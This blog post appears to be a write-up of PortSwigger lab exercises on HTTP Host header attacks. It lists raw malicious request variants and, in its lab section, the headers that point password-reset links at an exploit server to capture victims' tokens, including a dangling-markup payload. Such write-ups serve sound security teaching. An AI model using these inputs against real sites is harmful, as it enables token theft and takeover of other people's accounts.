- Published on
PortSwigger - Host Header Attacks
- Authors
- Name
- Asif Masood
- @A51F221B
Host Header Attacks
The Host
header in HTTP is mandatory since HTTP/1.1
. It specifies the domain name the client wants to access. Now a days its common for multiple websites to be accessible via same IP address.
There are two scenarios : Virtual Hosting : Multiple Websites hosted on a single IP address Routing : Multiple websites being load balanced via a single reverse proxy
In both the above cases host header is an important component to determine where the request should be sent. Many websites don't know what domain they are deployed on. They usually get the help from server _SERVER['HOST']
to retrieve domain name. As Host header is attacker controllable , this can lead to many vulnerabilities if not properly escaped or sanitized.
We can use following techniques to check for this vulnerability :
- Supply an arbitrary Host header
- Check for flawed validation
GET /example HTTP/1.1
Host: vulnerable-website.com:bad-stuff-here
- Send ambiguous requests
- Inject duplicate host headers
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: bad-stuff-here
- Supply an absolute URL
GET https:/ HTTP/1.1
Host: bad-stuff-here
- Add line wrapping
GET /example HTTP/1.1
Host: bad-stuff-here
Host: vulnerable-website.com
- Inject Host override headers
GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: bad-stuff-here
Some other headers we can use :
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
Password reset poisoning
If the password reset url is dynamically generated via user controllable input such as Host header it may be possible to get a poisoned link
lab : Basic password reset poisoning
// [https://0a11000b0368653481ef11260005004d.web-security-academy.net/forgot-password?temp-forgot-password-token=157e68e7ajplv4x9vqnal6mqmbresc63](https://0a11000b0368653481ef11260005004d.web-security-academy.net/forgot-password?temp-forgot-password-token=157e68e7ajplv4x9vqnal6mqmbresc63)
// Host header is changed to the exploit server to get token
Host: exploit-0a89002f03c065a5816b10c5014000ba.exploit-server.net
// This leads to a token leakage , we replace the token in the above url to change the password of the victim
lab : Password reset poisoning via middleware
// using X-Forwarded-Host to point to attack server to get token
X-Forwarded-Host: exploit-0a5c002103f7509381cf0299018f0045.exploit-server.net
lab : Password reset poisoning via dangling markup
Host: 0aa300e1045c624780ddb26a00e30026.web-security-academy.net:'<a href="//exploit-0ae2002404e662c680b5b19f010400d5.exploit-server.net/?